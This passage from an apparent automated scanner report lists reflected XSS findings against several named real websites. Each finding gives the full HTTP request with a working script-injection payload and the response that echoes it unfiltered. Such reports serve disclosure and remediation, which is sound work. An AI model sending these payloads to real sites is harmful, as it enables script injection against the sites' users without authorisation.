Cookie: __qca=P0-166217050-1302538865283; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; p_DQS=e30%3D%205c0d1f27263717ce10d0a1c64361f825b5c87b56%201302538201; rsi_segs=D08734_70852|E05510_10451; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302543673824%3B%20omtr_lv%3D1302541873827%7C1397149873827%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302543673827%3B%20s_nr%3D1302541873831%7C1305133873831%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3667
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 17:21:44 GMT
Connection: close

videoPlayer.feed.parse_5608364g_dioediv37528<script>alert(1)</script>7470e4c716a({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 13:21:44 EDT","lastBuildDate":"Mon, 11 Apr 2011 13:21:44 EDT","generato
...[SNIP]...

1.112. http://wcax.upickem.net/engine/Splash.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d9ff'-alert(1)-'bb75a418f1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /engine/Splash.aspx?contestid=17178&9d9ff'-alert(1)-'bb75a418f1c=1 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:30 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=506952470-4/9/2011 8:31:30 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:30 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:30 GMT
Content-Length: 39277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
if (intMode == 0) {
//User is not yet logged into UP and connecting to FB for the first time
window.location.href = '/engine/Splash.aspx?contestid=17178&9d9ff'-alert(1)-'bb75a418f1c=1&FBConnect=1';
} else if (intMode == 1) {
//User is already logged into Upickem but connecting to FB for the first time
window.location.href =
...[SNIP]...

1.113. http://wptz.placelocal.com/_js/ad.js.php [adWidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/ad.js.php

Issue detail

The value of the adWidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33f0"%3balert(1)//4cbe115c7e1 was submitted in the adWidth parameter. This input was echoed as b33f0";alert(1)//4cbe115c7e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/ad.js.php?clientID=7cbbc409ec990f19c78c75bd1e06f215&adWidth=300b33f0"%3balert(1)//4cbe115c7e1&adHeight=250&campaign_api=dispCamp.getNextCampaign&api_url=api.placelocal.com&domain_name=wptz.placelocal.com&tracking_url=tracking.placelocal.com HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:25 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:25 GMT
Vary: Accept-Encoding
Content-Length: 11077

var scripts_uufugb = document.getElementsByTagName('script');var scriptEl_uufugb = scripts_uufugb[ scripts_uufugb.length - 1 ];var scriptParent_uufugb = scriptEl_uufugb.parentNode;var queryString_uufu
...[SNIP]...
parent', allowScriptAccess: 'always' }; /* C4 */ var attributes = { id:'Ad_uufugb' }; var uniqueId = Math.ceil(Math.random()*500); /* C5 */var swfUrl = "http://"+domain_name_uufugb+"/flash/Ad_Frame_300b33f0";alert(1)//4cbe115c7e1.swf"; var firstParam = true; if (click_tag_uufugb != '') { swfUrl += (firstParam == true ? '?' : '&'); swfUrl += 'clickTag=' + click_tag_uufugb; firstParam = false; } if (random_uufugb != '') { swfUrl
...[SNIP]...

1.114. http://wptz.placelocal.com/_js/scriptloader.js.php [loadedparam parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/scriptloader.js.php

Issue detail

The value of the loadedparam request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11e33"%3balert(1)//87ea4282f21 was submitted in the loadedparam parameter. This input was echoed as 11e33";alert(1)//87ea4282f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/scriptloader.js.php?version=&load_swfobject=true&load_flashdetect=false&loadedparam=011e33"%3balert(1)//87ea4282f21&suffix=_e6ugs2 HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:34 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:34 GMT
Vary: Accept-Encoding
Content-Length: 12583

var swfobject=function(){var w="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_
...[SNIP]...
(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}if(storedCallbackFn){storedCallbackFn(storedCallbackObj)}}isExpressInstallActive=false}}}}(); scriptsLoaded_e6ugs2(011e33";alert(1)//87ea4282f21);

1.115. http://wptz.placelocal.com/_js/scriptloader.js.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/scriptloader.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c73c"%3balert(1)//c2b1bed343 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c73c";alert(1)//c2b1bed343 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/scriptloader.js.php?version=&load_swfobject=true&load_flashdetect=false&loadedparam=0&suffix=_e6/8c73c"%3balert(1)//c2b1bed343ugs2 HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:39 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:39 GMT
Vary: Accept-Encoding
Content-Length: 12583

var swfobject=function(){var w="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_
...[SNIP]...
ility(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}if(storedCallbackFn){storedCallbackFn(storedCallbackObj)}}isExpressInstallActive=false}}}}(); scriptsLoaded_e6/8c73c";alert(1)//c2b1bed343ugs2(0);

1.116. http://wptz.placelocal.com/_js/scriptloader.js.php [suffix parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/scriptloader.js.php

Issue detail

The value of the suffix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1470b"%3balert(1)//aba93548af6 was submitted in the suffix parameter. This input was echoed as 1470b";alert(1)//aba93548af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/scriptloader.js.php?version=&load_swfobject=true&load_flashdetect=false&loadedparam=0&suffix=_e6ugs21470b"%3balert(1)//aba93548af6 HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:36 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:36 GMT
Vary: Accept-Encoding
Content-Length: 12583

var swfobject=function(){var w="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_
...[SNIP]...
ty(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}if(storedCallbackFn){storedCallbackFn(storedCallbackObj)}}isExpressInstallActive=false}}}}(); scriptsLoaded_e6ugs21470b";alert(1)//aba93548af6(0);

1.117. http://www.internetrix.net/action/event_signup/1066 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /action/event_signup/1066

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be0c7"><script>alert(1)</script>c3045ca88cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /actionbe0c7"><script>alert(1)</script>c3045ca88cd/event_signup/1066 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/events/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.6.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:24:54 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - actionbe0c7"><script>alert(1)</script>c3045ca88cd/event_signup/1066">
...[SNIP]...

1.118. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac5e2"><script>alert(1)</script>d100cc1e7c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /captchaac5e2"><script>alert(1)</script>d100cc1e7c7/77ebd8dc1911e2a888fa4585da1fe3e3.png HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:43 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30300


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - captchaac5e2"><script>alert(1)</script>d100cc1e7c7/77ebd8dc1911e2a888fa4585da1fe3e3.png">
...[SNIP]...

1.119. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e37"><script>alert(1)</script>9a58bced905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /captcha/77ebd8dc1911e2a888fa4585da1fe3e3.pngd0e37"><script>alert(1)</script>9a58bced905 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:50 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - captcha/77ebd8dc1911e2a888fa4585da1fe3e3.pngd0e37"><script>alert(1)</script>9a58bced905">
...[SNIP]...

1.120. http://www.internetrix.net/cgi-bin/ajax/utm_vars.cgi [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /cgi-bin/ajax/utm_vars.cgi

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fdfd"><script>alert(1)</script>22f25afd9d1e57476 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /cgi-bin9fdfd"><script>alert(1)</script>22f25afd9d1e57476/ajax/utm_vars.cgi?action=get_utm_variables&object_type=page&object_id=960&utm_params_applied=0&HTTP_ACCEPT_LANGUAGE=&REMOTE_ADDR=&HTTP_REFERER=&HTTP_USER_AGENT=&screen_width=1920&screen_height=1200&screen_depth=16&window_width=1079&window_height=1038&java_enabled=1&flash_vers=10.2.154 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
Origin: http://www.internetrix.net
X-Prototype-Version: 1.6.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.0.10.1302308294; __utmc=173809275; __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:33 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - cgi-bin9fdfd"><script>alert(1)</script>22f25afd9d1e57476/ajax/utm_vars.cgi">
...[SNIP]...

1.121. http://www.internetrix.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528f3"><script>alert(1)</script>476275b45cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico528f3"><script>alert(1)</script>476275b45cb HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.1.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:18 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - favicon.ico528f3"><script>alert(1)</script>476275b45cb">
...[SNIP]...

1.122. http://www.internetrix.net/flash/video.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /flash/video.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe4e5"><script>alert(1)</script>b4521d281d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flashfe4e5"><script>alert(1)</script>b4521d281d6/video.swf HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.0.10.1302308294; __utmc=173809275; __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:39 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - flashfe4e5"><script>alert(1)</script>b4521d281d6/video.swf">
...[SNIP]...

1.123. http://www.internetrix.net/flash/video.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /flash/video.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d5b6"><script>alert(1)</script>e5d06c4b308 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash/video.swf5d5b6"><script>alert(1)</script>e5d06c4b308 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.0.10.1302308294; __utmc=173809275; __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:46 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - flash/video.swf5d5b6"><script>alert(1)</script>e5d06c4b308">
...[SNIP]...

1.124. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /freestyle/optimizer

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9af0"><script>alert(1)</script>2c6e5ad129d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /freestylec9af0"><script>alert(1)</script>2c6e5ad129d/optimizer HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:18:41 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - freestylec9af0"><script>alert(1)</script>2c6e5ad129d/optimizer">
...[SNIP]...

1.125. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /freestyle/optimizer

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0633"><script>alert(1)</script>c221bb42d42 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /freestyle/optimizerf0633"><script>alert(1)</script>c221bb42d42 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:18:49 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
